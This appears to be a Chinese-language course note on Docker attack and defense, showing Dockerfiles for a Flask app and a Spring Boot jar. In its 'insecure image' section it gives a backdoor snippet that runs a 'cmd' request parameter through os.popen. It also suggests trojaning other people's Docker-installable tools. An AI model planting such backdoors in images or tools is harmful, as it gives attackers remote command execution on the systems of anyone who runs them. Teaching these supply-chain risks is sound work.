知识点:
1、云原生-Docker容器-构建制作
2、云原生-Docker容器-不安全镜像
3、云原生-Docker容器-第三方组件
演示案例-云上攻防-Docker容器-构建制作&不安全镜像&第三方组件
1、构建制作镜像
bash
Dockfile文件(这种方式用的比较多):
FROM ubuntu:22.04
#安装必要的软件包
RUN apt-get update && \
apt-get install -y python3 python3-pip python3-venv && \
rm -rf /var/lib/apt/lists/*
# 创建虚拟环境
RUN python3 -m venv /opt/venv
# 使用虚拟环境的pip安装依赖
COPY requirements.txt .
RUN /opt/venv/bin/pip install --no-cache-dir -r requirements.txt
# 复制应用代码
COPY app.py /opt/app.py
# 设置环境变量
ENV FLASK_APP=/opt/app.py
ENV FLASK_ENV=production
EXPOSE 500
# 设置虚拟环境的Python作为入口
ENTRYPOINT ["/opt/venv/bin/python", "-m", "flask", "run", "--host=0.0.0.0"]




bash
docker build . -t mywebsample //构建镜像,命名为 mywebsample
docker run -p 80:5000 mywebsample //基于 mywebsample 镜像启动容器,宿主机80 -> 容器5000





2、不安全的镜像
在上述Docker镜像中,加入隐藏后门调用
bash
cmd = request.args.get("cmd")
os.popen(cmd).read()


也可以二开别人已经写好的工具,在别人写好的工具上插入恶意代码(前提:工具支持docker安装并使用dockerfile来当作配置文件)






3、不安全第三方组件


bash
# 使用官方 OpenJDK 8 镜像作为基础
FROM openjdk:8-jre-alpine
# 设置维护者信息
LABEL maintainer="your-email@example.com"
LABEL description="JDK 8 Runtime Environment for Java Applications"
LABEL version="1.0"
# 设置工作目录
WORKDIR /app
# 创建非root用户运行应用(增强安全性)- Alpine Linux 方式
RUN addgroup -g 1000 appgroup && \
adduser -u 1000 -G appgroup -D appuser
# 将jar文件复制到容器中
COPY SpringBootThymeleaf49-0.0.1-SNAPSHOT.jar app.jar
# 设置文件权限
RUN chown appuser:appgroup app.jar
# 设置环境变量
ENV JAVA_OPTS=""
ENV APP_JAR="app.jar"
# 切换用户
USER appuser
# 暴露端口(根据你的应用调整)
EXPOSE 8080
# 启动应用
ENTRYPOINT ["sh", "-c", "java $JAVA_OPTS -jar $APP_JAR"]

bash
docker build . -t myjar
docker run -p 8080:8080 myjar

